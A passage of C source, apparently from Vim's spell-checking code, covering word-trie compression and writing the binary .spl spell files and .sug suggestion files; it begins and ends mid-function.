hashitem_T *hi;
int len = 0;
unsigned nr, n;
int compressed = 0;
/*
* Go through the list of siblings. Compress each child and then try
* finding an identical child to replace it.
* Note that with "child" we mean not just the node that is pointed to,
* but the whole list of siblings of which the child node is the first.
*/
for (np = node; np != NULL && !got_int; np = np->wn_sibling)
{
++len;
if ((child = np->wn_child) != NULL)
{
/* Compress the child first. This fills hashkey. */
compressed += node_compress(spin, child, ht, tot);
/* Try to find an identical child. */
hash = hash_hash(child->wn_u1.hashkey);
hi = hash_lookup(ht, child->wn_u1.hashkey, hash);
if (!HASHITEM_EMPTY(hi))
{
/* There are children we encountered before with a hash value
* identical to the current child. Now check if there is one
* that is really identical. */
for (tp = HI2WN(hi); tp != NULL; tp = tp->wn_u2.next)
if (node_equal(child, tp))
{
/* Found one! Now use that child in place of the
* current one. This means the current child and all
* its siblings is unlinked from the tree. */
++tp->wn_refs;
compressed += deref_wordnode(spin, child);
np->wn_child = tp;
break;
}
if (tp == NULL)
{
/* No other child with this hash value equals the child of
* the node, add it to the linked list after the first
* item. */
tp = HI2WN(hi);
child->wn_u2.next = tp->wn_u2.next;
tp->wn_u2.next = child;
}
}
else
/* No other child has this hash value, add it to the
* hashtable. */
hash_add_item(ht, hi, child->wn_u1.hashkey, hash);
}
}
*tot += len + 1; /* add one for the node that stores the length */
/*
* Make a hash key for the node and its siblings, so that we can quickly
* find a lookalike node. This must be done after compressing the sibling
* list, otherwise the hash key would become invalid by the compression.
*/
node->wn_u1.hashkey[0] = len;
nr = 0;
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_byte == NUL)
/* end node: use wn_flags, wn_region and wn_affixID */
n = np->wn_flags + (np->wn_region << 8) + (np->wn_affixID << 16);
else
/* byte node: use the byte value and the child pointer */
n = (unsigned)(np->wn_byte + ((long_u)np->wn_child << 8));
nr = nr * 101 + n;
}
/* Avoid NUL bytes, it terminates the hash key. */
n = nr & 0xff;
node->wn_u1.hashkey[1] = n == 0 ? 1 : n;
n = (nr >> 8) & 0xff;
node->wn_u1.hashkey[2] = n == 0 ? 1 : n;
n = (nr >> 16) & 0xff;
node->wn_u1.hashkey[3] = n == 0 ? 1 : n;
n = (nr >> 24) & 0xff;
node->wn_u1.hashkey[4] = n == 0 ? 1 : n;
node->wn_u1.hashkey[5] = NUL;
/* Check for CTRL-C pressed now and then. */
fast_breakcheck();
return compressed;
}
/*
* Return TRUE when two nodes have identical siblings and children.
*/
static int
node_equal(wordnode_T *n1, wordnode_T *n2)
{
wordnode_T *p1;
wordnode_T *p2;
for (p1 = n1, p2 = n2; p1 != NULL && p2 != NULL;
p1 = p1->wn_sibling, p2 = p2->wn_sibling)
if (p1->wn_byte != p2->wn_byte
|| (p1->wn_byte == NUL
? (p1->wn_flags != p2->wn_flags
|| p1->wn_region != p2->wn_region
|| p1->wn_affixID != p2->wn_affixID)
: (p1->wn_child != p2->wn_child)))
break;
return p1 == NULL && p2 == NULL;
}
static int
#ifdef __BORLANDC__
_RTLENTRYF
#endif
rep_compare(const void *s1, const void *s2);
/*
* Function given to qsort() to sort the REP items on "from" string.
*/
static int
#ifdef __BORLANDC__
_RTLENTRYF
#endif
rep_compare(const void *s1, const void *s2)
{
fromto_T *p1 = (fromto_T *)s1;
fromto_T *p2 = (fromto_T *)s2;
return STRCMP(p1->ft_from, p2->ft_from);
}
/*
* Write the Vim .spl file "fname".
* Return FAIL or OK;
*/
static int
write_vim_spell(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
int regionmask;
int round;
wordnode_T *tree;
int nodecount;
int i;
int l;
garray_T *gap;
fromto_T *ftp;
char_u *p;
int rr;
int retval = OK;
size_t fwv = 1; /* collect return value of fwrite() to avoid
warnings from picky compiler */
fd = mch_fopen((char *)fname, "w");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
/* <HEADER>: <fileID> <versionnr> */
/* <fileID> */
fwv &= fwrite(VIMSPELLMAGIC, VIMSPELLMAGICL, (size_t)1, fd);
if (fwv != (size_t)1)
/* Catch first write error, don't try writing more. */
goto theend;
putc(VIMSPELLVERSION, fd); /* <versionnr> */
/*
* <SECTIONS>: <section> ... <sectionend>
*/
/* SN_INFO: <infotext> */
if (spin->si_info != NULL)
{
putc(SN_INFO, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
i = (int)STRLEN(spin->si_info);
put_bytes(fd, (long_u)i, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_info, (size_t)i, (size_t)1, fd); /* <infotext> */
}
/* SN_REGION: <regionname> ...
* Write the region names only if there is more than one. */
if (spin->si_region_count > 1)
{
putc(SN_REGION, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
l = spin->si_region_count * 2;
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_region_name, (size_t)l, (size_t)1, fd);
/* <regionname> ... */
regionmask = (1 << spin->si_region_count) - 1;
}
else
regionmask = 0;
/* SN_CHARFLAGS: <charflagslen> <charflags> <folcharslen> <folchars>
*
* The table with character flags and the table for case folding.
* This makes sure the same characters are recognized as word characters
* when generating an when using a spell file.
* Skip this for ASCII, the table may conflict with the one used for
* 'encoding'.
* Also skip this for an .add.spl file, the main spell file must contain
* the table (avoids that it conflicts). File is shorter too.
*/
if (!spin->si_ascii && !spin->si_add)
{
char_u folchars[128 * 8];
int flags;
putc(SN_CHARFLAGS, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
/* Form the <folchars> string first, we need to know its length. */
l = 0;
for (i = 128; i < 256; ++i)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
l += mb_char2bytes(spelltab.st_fold[i], folchars + l);
else
#endif
folchars[l++] = spelltab.st_fold[i];
}
put_bytes(fd, (long_u)(1 + 128 + 2 + l), 4); /* <sectionlen> */
fputc(128, fd); /* <charflagslen> */
for (i = 128; i < 256; ++i)
{
flags = 0;
if (spelltab.st_isw[i])
flags |= CF_WORD;
if (spelltab.st_isu[i])
flags |= CF_UPPER;
fputc(flags, fd); /* <charflags> */
}
put_bytes(fd, (long_u)l, 2); /* <folcharslen> */
fwv &= fwrite(folchars, (size_t)l, (size_t)1, fd); /* <folchars> */
}
/* SN_MIDWORD: <midword> */
if (spin->si_midword != NULL)
{
putc(SN_MIDWORD, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
i = (int)STRLEN(spin->si_midword);
put_bytes(fd, (long_u)i, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_midword, (size_t)i, (size_t)1, fd);
/* <midword> */
}
/* SN_PREFCOND: <prefcondcnt> <prefcond> ... */
if (spin->si_prefcond.ga_len > 0)
{
putc(SN_PREFCOND, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
l = write_spell_prefcond(NULL, &spin->si_prefcond);
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
write_spell_prefcond(fd, &spin->si_prefcond);
}
/* SN_REP: <repcount> <rep> ...
* SN_SAL: <salflags> <salcount> <sal> ...
* SN_REPSAL: <repcount> <rep> ... */
/* round 1: SN_REP section
* round 2: SN_SAL section (unless SN_SOFO is used)
* round 3: SN_REPSAL section */
for (round = 1; round <= 3; ++round)
{
if (round == 1)
gap = &spin->si_rep;
else if (round == 2)
{
/* Don't write SN_SAL when using a SN_SOFO section */
if (spin->si_sofofr != NULL && spin->si_sofoto != NULL)
continue;
gap = &spin->si_sal;
}
else
gap = &spin->si_repsal;
/* Don't write the section if there are no items. */
if (gap->ga_len == 0)
continue;
/* Sort the REP/REPSAL items. */
if (round != 2)
qsort(gap->ga_data, (size_t)gap->ga_len,
sizeof(fromto_T), rep_compare);
i = round == 1 ? SN_REP : (round == 2 ? SN_SAL : SN_REPSAL);
putc(i, fd); /* <sectionID> */
/* This is for making suggestions, section is not required. */
putc(0, fd); /* <sectionflags> */
/* Compute the length of what follows. */
l = 2; /* count <repcount> or <salcount> */
for (i = 0; i < gap->ga_len; ++i)
{
ftp = &((fromto_T *)gap->ga_data)[i];
l += 1 + (int)STRLEN(ftp->ft_from); /* count <*fromlen> and <*from> */
l += 1 + (int)STRLEN(ftp->ft_to); /* count <*tolen> and <*to> */
}
if (round == 2)
++l; /* count <salflags> */
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
if (round == 2)
{
i = 0;
if (spin->si_followup)
i |= SAL_F0LLOWUP;
if (spin->si_collapse)
i |= SAL_COLLAPSE;
if (spin->si_rem_accents)
i |= SAL_REM_ACCENTS;
putc(i, fd); /* <salflags> */
}
put_bytes(fd, (long_u)gap->ga_len, 2); /* <repcount> or <salcount> */
for (i = 0; i < gap->ga_len; ++i)
{
/* <rep> : <repfromlen> <repfrom> <reptolen> <repto> */
/* <sal> : <salfromlen> <salfrom> <saltolen> <salto> */
ftp = &((fromto_T *)gap->ga_data)[i];
for (rr = 1; rr <= 2; ++rr)
{
p = rr == 1 ? ftp->ft_from : ftp->ft_to;
l = (int)STRLEN(p);
putc(l, fd);
if (l > 0)
fwv &= fwrite(p, l, (size_t)1, fd);
}
}
}
/* SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* This is for making suggestions, section is not required. */
if (spin->si_sofofr != NULL && spin->si_sofoto != NULL)
{
putc(SN_SOFO, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_sofofr);
put_bytes(fd, (long_u)(l + STRLEN(spin->si_sofoto) + 4), 4);
/* <sectionlen> */
put_bytes(fd, (long_u)l, 2); /* <sofofromlen> */
fwv &= fwrite(spin->si_sofofr, l, (size_t)1, fd); /* <sofofrom> */
l = (int)STRLEN(spin->si_sofoto);
put_bytes(fd, (long_u)l, 2); /* <sofotolen> */
fwv &= fwrite(spin->si_sofoto, l, (size_t)1, fd); /* <sofoto> */
}
/* SN_WORDS: <word> ...
* This is for making suggestions, section is not required. */
if (spin->si_commonwords.ht_used > 0)
{
putc(SN_WORDS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
/* round 1: count the bytes
* round 2: write the bytes */
for (round = 1; round <= 2; ++round)
{
int todo;
int len = 0;
hashitem_T *hi;
todo = (int)spin->si_commonwords.ht_used;
for (hi = spin->si_commonwords.ht_array; todo > 0; ++hi)
if (!HASHITEM_EMPTY(hi))
{
l = (int)STRLEN(hi->hi_key) + 1;
len += l;
if (round == 2) /* <word> */
fwv &= fwrite(hi->hi_key, (size_t)l, (size_t)1, fd);
--todo;
}
if (round == 1)
put_bytes(fd, (long_u)len, 4); /* <sectionlen> */
}
}
/* SN_MAP: <mapstr>
* This is for making suggestions, section is not required. */
if (spin->si_map.ga_len > 0)
{
putc(SN_MAP, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = spin->si_map.ga_len;
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_map.ga_data, (size_t)l, (size_t)1, fd);
/* <mapstr> */
}
/* SN_SUGFILE: <timestamp>
* This is used to notify that a .sug file may be available and at the
* same time allows for checking that a .sug file that is found matches
* with this .spl file. That's because the word numbers must be exactly
* right. */
if (!spin->si_nosugfile
&& (spin->si_sal.ga_len > 0
|| (spin->si_sofofr != NULL && spin->si_sofoto != NULL)))
{
putc(SN_SUGFILE, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)8, 4); /* <sectionlen> */
/* Set si_sugtime and write it to the file. */
spin->si_sugtime = time(NULL);
put_time(fd, spin->si_sugtime); /* <timestamp> */
}
/* SN_NOSPLITSUGS: nothing
* This is used to notify that no suggestions with word splits are to be
* made. */
if (spin->si_nosplitsugs)
{
putc(SN_NOSPLITSUGS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_NOCOMPUNDSUGS: nothing
* This is used to notify that no suggestions with compounds are to be
* made. */
if (spin->si_nocompoundsugs)
{
putc(SN_NOCOMPOUNDSUGS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_COMPOUND: compound info.
* We don't mark it required, when not supported all compound words will
* be bad words. */
if (spin->si_compflags != NULL)
{
putc(SN_COMPOUND, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_compflags);
for (i = 0; i < spin->si_comppat.ga_len; ++i)
l += (int)STRLEN(((char_u **)(spin->si_comppat.ga_data))[i]) + 1;
put_bytes(fd, (long_u)(l + 7), 4); /* <sectionlen> */
putc(spin->si_compmax, fd); /* <compmax> */
putc(spin->si_compminlen, fd); /* <compminlen> */
putc(spin->si_compsylmax, fd); /* <compsylmax> */
putc(0, fd); /* for Vim 7.0b compatibility */
putc(spin->si_compoptions, fd); /* <compoptions> */
put_bytes(fd, (long_u)spin->si_comppat.ga_len, 2);
/* <comppatcount> */
for (i = 0; i < spin->si_comppat.ga_len; ++i)
{
p = ((char_u **)(spin->si_comppat.ga_data))[i];
putc((int)STRLEN(p), fd); /* <comppatlen> */
fwv &= fwrite(p, (size_t)STRLEN(p), (size_t)1, fd);
/* <comppattext> */
}
/* <compflags> */
fwv &= fwrite(spin->si_compflags, (size_t)STRLEN(spin->si_compflags),
(size_t)1, fd);
}
/* SN_NOBREAK: NOBREAK flag */
if (spin->si_nobreak)
{
putc(SN_NOBREAK, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
/* It's empty, the presence of the section flags the feature. */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_SYLLABLE: syllable info.
* We don't mark it required, when not supported syllables will not be
* counted. */
if (spin->si_syllable != NULL)
{
putc(SN_SYLLABLE, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_syllable);
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_syllable, (size_t)l, (size_t)1, fd);
/* <syllable> */
}
/* end of <SECTIONS> */
putc(SN_END, fd); /* <sectionend> */
/*
* <LWORDTREE> <KWORDTREE> <PREFIXTREE>
*/
spin->si_memtot = 0;
for (round = 1; round <= 3; ++round)
{
if (round == 1)
tree = spin->si_foldroot->wn_sibling;
else if (round == 2)
tree = spin->si_keeproot->wn_sibling;
else
tree = spin->si_prefroot->wn_sibling;
/* Clear the index and wnode fields in the tree. */
clear_node(tree);
/* Count the number of nodes. Needed to be able to allocate the
* memory when reading the nodes. Also fills in index for shared
* nodes. */
nodecount = put_node(NULL, tree, 0, regionmask, round == 3);
/* number of nodes in 4 bytes */
put_bytes(fd, (long_u)nodecount, 4); /* <nodecount> */
spin->si_memtot += nodecount + nodecount * sizeof(int);
/* Write the nodes. */
(void)put_node(fd, tree, 0, regionmask, round == 3);
}
/* Write another byte to check for errors (file system full). */
if (putc(0, fd) == EOF)
retval = FAIL;
theend:
if (fclose(fd) == EOF)
retval = FAIL;
if (fwv != (size_t)1)
retval = FAIL;
if (retval == FAIL)
EMSG(_(e_write));
return retval;
}
/*
* Clear the index and wnode fields of "node", it siblings and its
* children. This is needed because they are a union with other items to save
* space.
*/
static void
clear_node(wordnode_T *node)
{
wordnode_T *np;
if (node != NULL)
for (np = node; np != NULL; np = np->wn_sibling)
{
np->wn_u1.index = 0;
np->wn_u2.wnode = NULL;
if (np->wn_byte != NUL)
clear_node(np->wn_child);
}
}
/*
* Dump a word tree at node "node".
*
* This first writes the list of possible bytes (siblings). Then for each
* byte recursively write the children.
*
* NOTE: The code here must match the code in read_tree_node(), since
* assumptions are made about the indexes (so that we don't have to write them
* in the file).
*
* Returns the number of nodes used.
*/
static int
put_node(
FILE *fd, /* NULL when only counting */
wordnode_T *node,
int idx,
int regionmask,
int prefixtree) /* TRUE for PREFIXTREE */
{
int newindex = idx;
int siblingcount = 0;
wordnode_T *np;
int flags;
/* If "node" is zero the tree is empty. */
if (node == NULL)
return 0;
/* Store the index where this node is written. */
node->wn_u1.index = idx;
/* Count the number of siblings. */
for (np = node; np != NULL; np = np->wn_sibling)
++siblingcount;
/* Write the sibling count. */
if (fd != NULL)
putc(siblingcount, fd); /* <siblingcount> */
/* Write each sibling byte and optionally extra info. */
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_byte == 0)
{
if (fd != NULL)
{
/* For a NUL byte (end of word) write the flags etc. */
if (prefixtree)
{
/* In PREFIXTREE write the required affixID and the
* associated condition nr (stored in wn_region). The
* byte value is misused to store the "rare" and "not
* combining" flags */
if (np->wn_flags == (short_u)PFX_FLAGS)
putc(BY_NOFLAGS, fd); /* <byte> */
else
{
putc(BY_FLAGS, fd); /* <byte> */
putc(np->wn_flags, fd); /* <pflags> */
}
putc(np->wn_affixID, fd); /* <affixID> */
put_bytes(fd, (long_u)np->wn_region, 2); /* <prefcondnr> */
}
else
{
/* For word trees we write the flag/region items. */
flags = np->wn_flags;
if (regionmask != 0 && np->wn_region != regionmask)
flags |= WF_REGION;
if (np->wn_affixID != 0)
flags |= WF_AFX;
if (flags == 0)
{
/* word without flags or region */
putc(BY_NOFLAGS, fd); /* <byte> */
}
else
{
if (np->wn_flags >= 0x100)
{
putc(BY_FLAGS2, fd); /* <byte> */
putc(flags, fd); /* <flags> */
putc((unsigned)flags >> 8, fd); /* <flags2> */
}
else
{
putc(BY_FLAGS, fd); /* <byte> */
putc(flags, fd); /* <flags> */
}
if (flags & WF_REGION)
putc(np->wn_region, fd); /* <region> */
if (flags & WF_AFX)
putc(np->wn_affixID, fd); /* <affixID> */
}
}
}
}
else
{
if (np->wn_child->wn_u1.index != 0
&& np->wn_child->wn_u2.wnode != node)
{
/* The child is written elsewhere, write the reference. */
if (fd != NULL)
{
putc(BY_INDEX, fd); /* <byte> */
/* <nodeidx> */
put_bytes(fd, (long_u)np->wn_child->wn_u1.index, 3);
}
}
else if (np->wn_child->wn_u2.wnode == NULL)
/* We will write the child below and give it an index. */
np->wn_child->wn_u2.wnode = node;
if (fd != NULL)
if (putc(np->wn_byte, fd) == EOF) /* <byte> or <xbyte> */
{
EMSG(_(e_write));
return 0;
}
}
}
/* Space used in the array when reading: one for each sibling and one for
* the count. */
newindex += siblingcount + 1;
/* Recursively dump the children of each sibling. */
for (np = node; np != NULL; np = np->wn_sibling)
if (np->wn_byte != 0 && np->wn_child->wn_u2.wnode == node)
newindex = put_node(fd, np->wn_child, newindex, regionmask,
prefixtree);
return newindex;
}
/*
* ":mkspell [-ascii] outfile infile ..."
* ":mkspell [-ascii] addfile"
*/
void
ex_mkspell(exarg_T *eap)
{
int fcount;
char_u **fnames;
char_u *arg = eap->arg;
int ascii = FALSE;
if (STRNCMP(arg, "-ascii", 6) == 0)
{
ascii = TRUE;
arg = skipwhite(arg + 6);
}
/* Expand all the remaining arguments (e.g., $VIMRUNTIME). */
if (get_arglist_exp(arg, &fcount, &fnames, FALSE) == OK)
{
mkspell(fcount, fnames, ascii, eap->forceit, FALSE);
FreeWild(fcount, fnames);
}
}
/*
* Create the .sug file.
* Uses the soundfold info in "spin".
* Writes the file with the name "wfname", with ".spl" changed to ".sug".
*/
static void
spell_make_sugfile(spellinfo_T *spin, char_u *wfname)
{
char_u *fname = NULL;
int len;
slang_T *slang;
int free_slang = FALSE;
/*
* Read back the .spl file that was written. This fills the required
* info for soundfolding. This also uses less memory than the
* pointer-linked version of the trie. And it avoids having two versions
* of the code for the soundfolding stuff.
* It might have been done already by spell_reload_one().
*/
for (slang = first_lang; slang != NULL; slang = slang->sl_next)
if (fullpathcmp(wfname, slang->sl_fname, FALSE) == FPC_SAME)
break;
if (slang == NULL)
{
spell_message(spin, (char_u *)_("Reading back spell file..."));
slang = spell_load_file(wfname, NULL, NULL, FALSE);
if (slang == NULL)
return;
free_slang = TRUE;
}
/*
* Clear the info in "spin" that is used.
*/
spin->si_blocks = NULL;
spin->si_blocks_cnt = 0;
spin->si_compress_cnt = 0; /* will stay at 0 all the time*/
spin->si_free_count = 0;
spin->si_first_free = NULL;
spin->si_foldwcount = 0;
/*
* Go through the trie of good words, soundfold each word and add it to
* the soundfold trie.
*/
spell_message(spin, (char_u *)_("Performing soundfolding..."));
if (sug_filltree(spin, slang) == FAIL)
goto theend;
/*
* Create the table which links each soundfold word with a list of the
* good words it may come from. Creates buffer "spin->si_spellbuf".
* This also removes the wordnr from the NUL byte entries to make
* compression possible.
*/
if (sug_maketable(spin) == FAIL)
goto theend;
smsg((char_u *)_("Number of words after soundfolding: %ld"),
(long)spin->si_spellbuf->b_ml.ml_line_count);
/*
* Compress the soundfold trie.
*/
spell_message(spin, (char_u *)_(msg_compressing));
wordtree_compress(spin, spin->si_foldroot);
/*
* Write the .sug file.
* Make the file name by changing ".spl" to ".sug".
*/
fname = alloc(MAXPATHL);
if (fname == NULL)
goto theend;
vim_strncpy(fname, wfname, MAXPATHL - 1);
len = (int)STRLEN(fname);
fname[len - 2] = 'u';
fname[len - 1] = 'g';
sug_write(spin, fname);
theend:
vim_free(fname);
if (free_slang)
slang_free(slang);
free_blocks(spin->si_blocks);
close_spellbuf(spin->si_spellbuf);
}
/*
* Build the soundfold trie for language "slang".
*/
static int
sug_filltree(spellinfo_T *spin, slang_T *slang)
{
char_u *byts;
idx_T *idxs;
int depth;
idx_T arridx[MAXWLEN];
int curi[MAXWLEN];
char_u tword[MAXWLEN];
char_u tsalword[MAXWLEN];
int c;
idx_T n;
unsigned words_done = 0;
int wordcount[MAXWLEN];
/* We use si_foldroot for the soundfolded trie. */
spin->si_foldroot = wordtree_alloc(spin);
if (spin->si_foldroot == NULL)
return FAIL;
/* let tree_add_word() know we're adding to the soundfolded tree */
spin->si_sugtree = TRUE;
/*
* Go through the whole case-folded tree, soundfold each word and put it
* in the trie.
*/
byts = slang->sl_fbyts;
idxs = slang->sl_fidxs;
arridx[0] = 0;
curi[0] = 1;
wordcount[0] = 0;
depth = 0;
while (depth >= 0 && !got_int)
{
if (curi[depth] > byts[arridx[depth]])
{
/* Done all bytes at this node, go up one level. */
idxs[arridx[depth]] = wordcount[depth];
if (depth > 0)
wordcount[depth - 1] += wordcount[depth];
--depth;
line_breakcheck();
}
else
{
/* Do one more byte at this node. */
n = arridx[depth] + curi[depth];
++curi[depth];
c = byts[n];
if (c == 0)
{
/* Sound-fold the word. */
tword[depth] = NUL;
spell_soundfold(slang, tword, TRUE, tsalword);
/* We use the "flags" field for the MSB of the wordnr,
* "region" for the LSB of the wordnr. */
if (tree_add_word(spin, tsalword, spin->si_foldroot,
words_done >> 16, words_done & 0xffff,
0) == FAIL)
return FAIL;
++words_done;
++wordcount[depth];
/* Reset the block count each time to avoid compression
* kicking in. */
spin->si_blocks_cnt = 0;
/* Skip over any other NUL bytes (same word with different
* flags). */
while (byts[n + 1] == 0)
{
++n;
++curi[depth];
}
}
else
{
/* Normal char, go one level deeper. */
tword[depth++] = c;
arridx[depth] = idxs[n];
curi[depth] = 1;
wordcount[depth] = 0;
}
}
}
smsg((char_u *)_("Total number of words: %d"), words_done);
return OK;
}
/*
* Make the table that links each word in the soundfold trie to the words it
* can be produced from.
* This is not unlike lines in a file, thus use a memfile to be able to access
* the table efficiently.
* Returns FAIL when out of memory.
*/
static int
sug_maketable(spellinfo_T *spin)
{
garray_T ga;
int res = OK;
/* Allocate a buffer, open a memline for it and create the swap file
* (uses a temp file, not a .swp file). */
spin->si_spellbuf = open_spellbuf();
if (spin->si_spellbuf == NULL)
return FAIL;
/* Use a buffer to store the line info, avoids allocating many small
* pieces of memory. */
ga_init2(&ga, 1, 100);
/* recursively go through the tree */
if (sug_filltable(spin, spin->si_foldroot->wn_sibling, 0, &ga) == -1)
res = FAIL;
ga_clear(&ga);
return res;
}
/*
* Fill the table for one node and its children.
* Returns the wordnr at the start of the node.
* Returns -1 when out of memory.
*/
static int
sug_filltable(
spellinfo_T *spin,
wordnode_T *node,
int startwordnr,
garray_T *gap) /* place to store line of numbers */
{
wordnode_T *p, *np;
int wordnr = startwordnr;
int nr;
int prev_nr;
for (p = node; p != NULL; p = p->wn_sibling)
{
if (p->wn_byte == NUL)
{
gap->ga_len = 0;
prev_nr = 0;
for (np = p; np != NULL && np->wn_byte == NUL; np = np->wn_sibling)
{
if (ga_grow(gap, 10) == FAIL)
return -1;
nr = (np->wn_flags << 16) + (np->wn_region & 0xffff);
/* Compute the offset from the previous nr and store the
* offset in a way that it takes a minimum number of bytes.
* It's a bit like utf-8, but without the need to mark
* following bytes. */
nr -= prev_nr;
prev_nr += nr;
gap->ga_len += offset2bytes(nr,
(char_u *)gap->ga_data + gap->ga_len);
}
/* add the NUL byte */
((char_u *)gap->ga_data)[gap->ga_len++] = NUL;
if (ml_append_buf(spin->si_spellbuf, (linenr_T)wordnr,
gap->ga_data, gap->ga_len, TRUE) == FAIL)
return -1;
++wordnr;
/* Remove extra NUL entries, we no longer need them. We don't
* bother freeing the nodes, the won't be reused anyway. */
while (p->wn_sibling != NULL && p->wn_sibling->wn_byte == NUL)
p->wn_sibling = p->wn_sibling->wn_sibling;
/* Clear the flags on the remaining NUL node, so that compression
* works a lot better. */
p->wn_flags = 0;
p->wn_region = 0;
}
else
{
wordnr = sug_filltable(spin, p->wn_child, wordnr, gap);
if (wordnr == -1)
return -1;
}
}
return wordnr;
}
/*
* Convert an offset into a minimal number of bytes.
* Similar to utf_char2byters, but use 8 bits in followup bytes and avoid NUL
* bytes.
*/
static int
offset2bytes(int nr, char_u *buf)
{
int rem;
int b1, b2, b3, b4;
/* Split the number in parts of base 255. We need to avoid NUL bytes. */
b1 = nr % 255 + 1;
rem = nr / 255;
b2 = rem % 255 + 1;
rem = rem / 255;
b3 = rem % 255 + 1;
b4 = rem / 255 + 1;
if (b4 > 1 || b3 > 0x1f) /* 4 bytes */
{
buf[0] = 0xe0 + b4;
buf[1] = b3;
buf[2] = b2;
buf[3] = b1;
return 4;
}
if (b3 > 1 || b2 > 0x3f ) /* 3 bytes */
{
buf[0] = 0xc0 + b3;
buf[1] = b2;
buf[2] = b1;
return 3;
}
if (b2 > 1 || b1 > 0x7f ) /* 2 bytes */
{
buf[0] = 0x80 + b2;
buf[1] = b1;
return 2;
}
/* 1 byte */
buf[0] = b1;
return 1;
}
/*
* Write the .sug file in "fname".
*/
static void
sug_write(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
wordnode_T *tree;
int nodecount;
int wcount;
char_u *line;
linenr_T lnum;
int len;
/* Create the file. Note that an existing file is silently overwritten! */
fd = mch_fopen((char *)fname, "w");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return;
}
vim_snprintf((char *)IObuff, IOSIZE,
_("Writing suggestion file %s ..."), fname);
spell_message(spin, IObuff);
/*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*/
if (fwrite(VIMSUGMAGIC, VIMSUGMAGICL, (size_t)1, fd) != 1) /* <fileID> */
{
EMSG(_(e_write));
goto theend;
}
putc(VIMSUGVERSION, fd); /* <versionnr> */
/* Write si_sugtime to the file. */
put_time(fd, spin->si_sugtime); /* <timestamp> */
/*
* <SUGWORDTREE>
*/
spin->si_memtot = 0;
tree = spin->si_foldroot->wn_sibling;
/* Clear the index and wnode fields in the tree. */
clear_node(tree);
/* Count the number of nodes. Needed to be able to allocate the
* memory when reading the nodes. Also fills in index for shared
* nodes. */
nodecount = put_node(NULL, tree, 0, 0, FALSE);
/* number of nodes in 4 bytes */
put_bytes(fd, (long_u)nodecount, 4); /* <nodecount> */
spin->si_memtot += nodecount + nodecount * sizeof(int);
/* Write the nodes. */
(void)put_node(fd, tree, 0, 0, FALSE);
/*
* <SUGTABLE>: <sugwcount> <sugline> ...
*/
wcount = spin->si_spellbuf->b_ml.ml_line_count;
put_bytes(fd, (long_u)wcount, 4); /* <sugwcount> */
for (lnum = 1; lnum <= (linenr_T)wcount; ++lnum)
{
/* <sugline>: <sugnr> ... NUL */
line = ml_get_buf(spin->si_spellbuf, lnum, FALSE);
len = (int)STRLEN(line) + 1;
if (fwrite(line, (size_t)len, (size_t)1, fd) == 0)
{
EMSG(_(e_write));
goto theend;
}
spin->si_memtot += len;
}
/* Write another byte to check for errors. */
if (putc(0, fd) == EOF)
EMSG(_(e_write));
vim_snprintf((char *)IObuff, IOSIZE,
_("Estimated runtime memory use: %d bytes"), spin->si_memtot);
spell_message(spin, IObuff);
theend:
/* close the file */
fclose(fd);
}
/*
* Create a Vim spell file from one or more word lists.
* "fnames[0]" is the output file name.
* "fnames[fcount - 1]" is the last input file name.
* Exception: when "fnames[0]" ends in ".add" it's used as the input file name
* and ".spl" is appended to make the output file name.
*/
void
mkspell(
int fcount,
char_u **fnames,
int ascii, /* -ascii argument given */
int over_write, /* overwrite existing output file */
int added_word) /* invoked through "zg" */
{
char_u *fname = NULL;
char_u *wfname;
char_u **innames;
int incount;
afffile_T *(afile[8]);
int i;
int len;
stat_T st;
int error = FALSE;
spellinfo_T spin;
vim_memset(&spin, 0, sizeof(spin));
spin.si_verbose = !added_word;
spin.si_ascii = ascii;
spin.si_followup = TRUE;
spin.si_rem_accents = TRUE;
ga_init2(&spin.si_rep, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_repsal, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_sal, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_map, (int)sizeof(char_u), 100);
ga_init2(&spin.si_comppat, (int)sizeof(char_u *), 20);
ga_init2(&spin.si_prefcond, (int)sizeof(char_u *), 50);
hash_init(&spin.si_commonwords);
spin.si_newcompID = 127; /* start compound ID at first maximum */
/* default: fnames[0] is output file, following are input files */
innames = &fnames[1];
incount = fcount - 1;
wfname = alloc(MAXPATHL);
if (wfname == NULL)
return;
if (fcount >= 1)
{
len = (int)STRLEN(fnames[0]);
